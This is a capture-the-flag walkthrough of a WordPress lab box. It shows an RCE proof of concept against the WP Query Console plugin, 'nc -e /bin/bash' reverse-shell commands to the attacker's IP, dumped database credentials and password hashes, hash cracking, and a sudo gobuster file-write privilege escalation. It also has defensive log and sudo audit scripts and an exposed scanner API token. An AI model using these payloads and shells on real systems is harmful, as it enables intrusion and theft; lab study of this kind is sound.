
HMV-buster

A walkthrough of HMV-buster, a box built by the great ta0.

Port scan

┌──(root㉿kakeru)-[~/tmp]
└─# nmap -A 192.168.240.231
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-05 14:48 CST
Nmap scan report for 192.168.240.231 (192.168.240.231)
Host is up (0.0020s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u4 (protocol 2.0)
| ssh-hostkey:
| 2048 c2:91:d9:a5:f7:a3:98:1f:c1:4a:70:28:aa:ba:a4:10 (RSA)
| 256 3e:1f:c9:eb:c0:6f:24:06:fc:52:5f:2f:1b:35:33:ec (ECDSA)
|_ 256 ec:64:87:04:9a:4b:32:fe:2d:1f:9a:b0:81:d3:7c:cf (ED25519)
80/tcp open http nginx 1.14.2
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-server-header: nginx/1.14.2
|_http-title: bammmmuwe
|_http-generator: WordPress 6.7.1
MAC Address: 6A:4C:9F:02:22:6E (Unknown)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 2.05 ms 192.168.240.231 (192.168.240.231)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.13 seconds

Ports 80 and 22 are open, so go straight to the web service for information.

Web enumeration

Visiting the web service shows that the site runs on WordPress.

Use wpscan to enumerate users and plugins, then check whether any of them has a known vulnerability. A long wait follows~

┌──(root㉿kakeru)-[~/tmp]
└─# wpscan --api-token r4NahZxa7hHyx6tcZVYdfivP0YNXqmTaJXwqgMatwmE --url http://192.168.240.231/ -e u,ap --plugins-detection aggressive
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.8.27
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.240.231/ [192.168.240.231]
[+] Started: Wed Feb 5 14:57:35 2025

Interesting Finding(s):

[+] Headers
| Interesting Entry: Server: nginx/1.14.2
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] robots.txt found: http://192.168.240.231/robots.txt
| Interesting Entries:
| - /wp-admin/
| - /wp-admin/admin-ajax.php
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.240.231/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.240.231/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.240.231/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 6.7.1 identified (Latest, released on 2024-11-21).
| Found By: Meta Generator (Passive Detection)
| - http://192.168.240.231/, Match: 'WordPress 6.7.1'
| Confirmed By: Rss Generator (Aggressive Detection)
| - http://192.168.240.231/feed/, <generator>https://wordpress.org/?v=6.7.1</generator>
| - http://192.168.240.231/comments/feed/, <generator>https://wordpress.org/?v=6.7.1</generator>

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Aggressive Methods)
Checking Known Locations - Time: 01:58:02 <=============================> (108898 / 108898) 100.00% Time: 01:58:02
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] akismet
| Location: http://192.168.240.231/wp-content/plugins/akismet/
| Last Updated: 2025-02-04T21:01:00.000Z
| Readme: http://192.168.240.231/wp-content/plugins/akismet/readme.txt
| [!] The version is out of date, the latest version is 5.3.6
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.240.231/wp-content/plugins/akismet/, status: 200
|
| Version: 5.3.5 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.240.231/wp-content/plugins/akismet/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.240.231/wp-content/plugins/akismet/readme.txt

[+] feed
| Location: http://192.168.240.231/wp-content/plugins/feed/
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.240.231/wp-content/plugins/feed/, status: 200
|
| The version could not be determined.

[+] wp-query-console
| Location: http://192.168.240.231/wp-content/plugins/wp-query-console/
| Latest Version: 1.0 (up to date)
| Last Updated: 2018-03-16T16:03:00.000Z
| Readme: http://192.168.240.231/wp-content/plugins/wp-query-console/README.txt
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.240.231/wp-content/plugins/wp-query-console/, status: 403
|
| [!] 1 vulnerability identified:
|
| [!] Title: WP Query Console <= 1.0 - Unauthenticated Remote Code Execution
| References:
| - https://wpscan.com/vulnerability/f911568d-5f79-49b7-8ce4-fa0da3183214
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-50498
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/ae07ca12-e827-43f9-8cbb-275b9abbd4c3
|
| Version: 1.0 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.240.231/wp-content/plugins/wp-query-console/README.txt

[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:01 <=====================================> (10 / 10) 100.00% Time: 00:00:01

[i] User(s) Identified:

[+] ta0
| Found By: Wp Json Api (Aggressive Detection)
| - http://192.168.240.231/wp-json/wp/v2/users/?per_page=100&page=1
| Confirmed By:
| Rss Generator (Aggressive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

[+] welcome
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

[+] WPScan DB API OK
| Plan: free
| Requests Done (during the scan): 3
| Requests Remaining: 21

[+] Finished: Wed Feb 5 16:55:51 2025
[+] Requests Done: 108944
[+] Cached Requests: 43
[+] Data Sent: 29.459 MB
[+] Data Received: 33.016 MB
[+] Memory used: 423.633 MB
[+] Elapsed time: 01:58:16

The scan took well over an hour. It shows two users, ta0 and welcome.
Three plugins were found; the exploitable one is wp-query-console.
Searching for this plugin turns up the PoC:

POST /wp-json/wqc/v1/query HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://kubernetes.docker.internal/wp-admin/admin.php?page=wp-query-console
Content-Type: application/json
Content-Length: 45
Origin: http://kubernetes.docker.internal
Connection: keep-alive
Priority: u=0

{"queryArgs":"phpinfo();","queryType":"post"}

Change the Host header and it can be used directly.

We can see that some functions are banned, but shell_exec is not.
Ping our own machine, then check locally whether shell_exec can be used:
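As an added example (not from the write-up), here is a detector for the two traces this phase leaves in the target's nginx access log: the burst of plugin-directory probes from the aggressive wpscan run, and POST requests to the WP Query Console REST route used by the PoC. The log lines are constructed and the nginx "combined" log format is assumed.

```python
"""Flag wpscan-style plugin enumeration and POSTs to /wp-json/wqc/v1/query
in nginx access logs. Added example; sample lines below are constructed."""
import re
from collections import defaultdict

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
PLUGIN_PREFIX = "/wp-content/plugins/"
WQC_ROUTE = "/wp-json/wqc/v1/query"

def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def analyse(lines, enum_threshold=50):
    """Return (enumerating_ips, wqc_posts).

    A client is reported as enumerating once it has probed enum_threshold
    distinct plugin directories that did not answer 200; every POST to the
    wqc route is reported, since only the plugin's own admin page uses it."""
    probes = defaultdict(set)
    wqc_posts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]
        if path.startswith(PLUGIN_PREFIX) and rec["status"] != "200":
            probes[rec["ip"]].add(path)
        elif path == WQC_ROUTE and rec["method"] == "POST":
            wqc_posts.append((rec["ip"], rec["ts"]))
    enumerating = sorted(ip for ip, paths in probes.items() if len(paths) >= enum_threshold)
    return enumerating, wqc_posts

# Constructed sample: one scanner probing 60 plugin slugs, one ordinary visitor
# fetching real plugin assets, and one POST to the query-console route.
SCANNER, VISITOR = "192.168.240.83", "192.168.240.50"
def _line(ip, method, path, status, ts="05/Feb/2025:14:57:35 +0800"):
    return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" {status} 153 "-" "Mozilla/5.0"'

SAMPLE_LOG = [_line(SCANNER, "GET", f"/wp-content/plugins/plugin-{i}/", 404) for i in range(60)]
SAMPLE_LOG += [
    _line(VISITOR, "GET", "/wp-content/plugins/akismet/_inc/akismet.js", 200),
    _line(VISITOR, "GET", "/wp-content/plugins/akismet/readme.txt", 200),
    _line(SCANNER, "POST", WQC_ROUTE, 200, "05/Feb/2025:17:25:17 +0800"),
]

if __name__ == "__main__":
    ips, posts = analyse(SAMPLE_LOG)
    print("enumerating clients:", ips)
    print("query-console POSTs:", posts)
```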

┌──(root㉿kakeru)-[~/tmp]
└─# tcpdump icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
17:25:17.256362 IP 192.168.240.231 > 192.168.240.83: ICMP echo request, id 1740, seq 1, length 64
17:25:17.256445 IP 192.168.240.83 > 192.168.240.231: ICMP echo reply, id 1740, seq 1, length 64
17:25:18.261902 IP 192.168.240.231 > 192.168.240.83: ICMP echo request, id 1740, seq 2, length 64
17:25:18.261977 IP 192.168.240.83 > 192.168.240.231: ICMP echo reply, id 1740, seq 2, length 64

Reverse shell

"shell_exec('nc -e /bin/bash 192.168.240.83 1234');"

Shell obtained.

Privilege escalation

After getting a shell, look at the WordPress configuration file:

www-data@listen:~/html/wordpress$ cat wp-config.php
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );

/** Database username */
define( 'DB_USER', 'll104567' );

/** Database password */
define( 'DB_PASSWORD', 'thehandsomeguy' );

/** Database hostname */
define( 'DB_HOST', 'localhost' );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

The database credentials are exposed:

MariaDB [wordpress]> select * from wp_users;
+----+------------+------------------------------------+---------------+-------------------+-----------------------+---------------------+-----------------------------------------------+-------------+--------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+-------------------+-----------------------+---------------------+-----------------------------------------------+-------------+--------------+
| 1 | ta0 | $P$BDDc71nM67DbOVN/U50WFGII6EF6.r. | ta0 | 2814928906@qq.com | http://192.168.31.181 | 2025-01-08 03:10:43 | | 0 | ta0 |
| 2 | welcome | $P$BtP9ZghJTwDfSn1gKKc.k3mq4Vo.Ko/ | welcome | 127.0.0.1@qq.com | | 2025-01-08 04:29:28 | 1736310568:$P$B2YbhlDVF1XWIurbL11Pfoasb./0tD. | 0 | welcome |
+----+------------+------------------------------------+---------------+-------------------+-----------------------+---------------------+-----------------------------------------------+-------------+--------------+
2 rows in set (0.014 sec)

MariaDB [wordpress]>

This yields two usernames with their password hashes; john cracks welcome's password, so next we switch to the welcome user.

┌──(root㉿kakeru)-[~/tmp]
└─# john tmp
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 128/128 ASIMD 4x2])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
Proceeding with incremental:ASCII
104567 (?)
1g 0:00:00:22 DONE 3/3 (2025-02-05 18:05) 0.04403g/s 8169p/s 8169c/s 8169C/s milling1..192011
Use the "--show --format=phpass" options to display all of the cracked passwords reliably
Session completed.

The user has sudo rights for gobuster:

$ sudo -l
Matching Defaults entries for welcome on listen:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User welcome may run the following commands on listen:
(ALL) NOPASSWD: /usr/bin/gobuster

Now we use pspy64 to look at the scheduled tasks; it can be downloaded from
https://github.com/DominicBreuker/pspy/releases/latest/download/pspy64

welcome@listen:~$ wget 192.168.240.83:8080/pspy64
--2025-02-05 05:17:15-- http://192.168.240.83:8080/pspy64
Connecting to 192.168.240.83:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3104768 (3.0M) [application/octet-stream]
Saving to: ‘pspy64’

pspy64 100%[=============================================>] 2.96M --.-KB/s in 0.1s

2025-02-05 05:17:15 (30.4 MB/s) - ‘pspy64’ saved [3104768/3104768]

welcome@listen:~$ chmod 777 pspy64
welcome@listen:~$ ./pspy64


2025/02/05 05:18:01 CMD: UID=0 PID=2047 | /usr/sbin/CRON -f
2025/02/05 05:18:01 CMD: UID=0 PID=2048 | /usr/sbin/CRON -f
2025/02/05 05:18:01 CMD: UID=0 PID=2049 | /bin/sh -c /bin/bash /opt/.test.sh
2025/02/05 05:19:01 CMD: UID=0 PID=2050 | /usr/sbin/CRON -f
2025/02/05 05:19:01 CMD: UID=0 PID=2051 | /usr/sbin/CRON -f
2025/02/05 05:19:01 CMD: UID=0 PID=2052 | /bin/sh -c /bin/bash /opt/.test.sh

We can see that root runs /opt/.test.sh on a cron schedule,
so our goal is to write a command (a reverse shell) into .test.sh.
The approach the experts came up with is brilliant: use the way gobuster echoes its results to write the command.
Concretely: start an HTTP server on our machine and create a file there; on the target, build our own wordlist and run gobuster against our machine, so the content of the wordlist on the target is echoed back in the output.

┌──(root㉿kakeru)-[~/tmp]
└─# touch a

┌──(root㉿kakeru)-[~/tmp]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.240.231 - - [05/Feb/2025 18:37:20] "GET / HTTP/1.1" 200 -
192.168.240.231 - - [05/Feb/2025 18:37:20] code 404, message File not found
192.168.240.231 - - [05/Feb/2025 18:37:20] "GET /f7c3be62-4f83-404f-9236-89f88603c3f8 HTTP/1.1" 404 -
192.168.240.231 - - [05/Feb/2025 18:37:20] "GET /a HTTP/1.1" 200 -

welcome@listen:/tmp$ touch a.txt
welcome@listen:/tmp$ echo "a" > a.txt
welcome@listen:/tmp$ sudo gobuster -u 192.168.240.83 -w /tmp/a.txt -q -n
welcome@listen:/tmp$ sudo gobuster -u 192.168.240.83 -w /tmp/a.txt -q -n
/a

This works because gobuster prints every wordlist entry it finds reachable; -q -n suppress the banner and the status codes.
That lets us write a reverse shell: -o writes the result to /opt/.test.sh.

┌──(root㉿kakeru)-[~]
└─# touch b


welcome@listen:/tmp$ echo "nc -e /bin/bash 192.168.240.83 1234 " > b
welcome@listen:/tmp$ chmod 777 b
welcome@listen:/tmp$ echo "tmp/b" > b.txt
welcome@listen:/tmp$ sudo gobuster -u 192.168.240.83 -w b.txt -q -n -o ┌──(root㉿kakeru)-[~/tmp]
bash: syntax error near unexpected token `('
welcome@listen:/tmp$ sudo gobuster -u 192.168.240.83 -w b.txt -q -n -o /opt/.test.sh
2025/02/05 05:42:21 [!] unable to connect to http://192.168.240.83/: Get http://192.168.240.83/: dial tcp 192.168.240.83:80: connect: connection refused
welcome@listen:/tmp$ sudo gobuster -u 192.168.240.83 -w b.txt -q -n -o /opt/.test.sh
welcome@listen:/tmp$ sudo gobuster -u 192.168.240.83 -w b.txt -q -n -o /opt/.test.sh

With the way I scan directories, the HTTP server has to be started from the home directory on my machine, otherwise there is no tmp directory.

┌──(root㉿kakeru)-[~]
└─# nc -lp 1234
id

id
uid=0(root) gid=0(root) groups=0(root)
uid=0(root) gid=0(root) groups=0(root)
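As an added example (not code from the write-up or the box), here is a small auditor for "sudo -l" output that flags the rule class abused in this escalation: a password-less rule on a tool whose output-file option lets the caller write any path as the run-as user, which is how /opt/.test.sh, executed by root's cron job, got overwritten. The table of file-writing options is an assumption seeded only with gobuster's -o.

```python
"""Audit 'sudo -l' output for NOPASSWD rules on tools that can write
arbitrary files (gobuster -o). Added example; the sample text is constructed."""
import re

# Binary -> option that writes results to a caller-chosen path.
# gobuster's -o/--output is the one used in the write-up; extend as needed.
FILE_WRITE_OPTIONS = {
    "/usr/bin/gobuster": "-o/--output",
}

RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")

def parse_sudo_l(text):
    """Parse the '(runas) TAG: cmd, cmd' lines of 'sudo -l'; other lines are skipped."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.rstrip(":") for t in m["tags"].split()}
        for cmd in m["cmds"].split(","):
            cmd = cmd.strip()
            rules.append({"runas": m["runas"].strip(), "nopasswd": "NOPASSWD" in tags,
                          "command": cmd, "binary": cmd.split()[0]})
    return rules

def audit(rules):
    """Return (binary, severity, reason) for every rule that deserves a second look."""
    findings = []
    for r in rules:
        if r["command"] == "ALL":
            findings.append((r["command"], "critical", "unrestricted sudo"))
        elif r["binary"] in FILE_WRITE_OPTIONS:
            opt = FILE_WRITE_OPTIONS[r["binary"]]
            sev = "high" if r["nopasswd"] else "medium"
            findings.append((r["binary"], sev, f"{opt} writes arbitrary files as {r['runas']}"))
        elif r["nopasswd"]:
            findings.append((r["binary"], "low", "password-less rule; confirm it cannot write files or spawn a shell"))
    return findings

# Constructed sample in the same shape as the 'sudo -l' output above.
SAMPLE = """Matching Defaults entries for welcome on listen:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin

User welcome may run the following commands on listen:
    (ALL) NOPASSWD: /usr/bin/gobuster
    (root) /usr/sbin/service nginx restart
"""

if __name__ == "__main__":
    for finding in audit(parse_sudo_l(SAMPLE)):
        print(*finding)
```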

Summary: 1. WordPress plugin scanning and the common ways plugins get exploited; 2. the general idea of using gobuster or other directory-scanning tools to read sensitive files.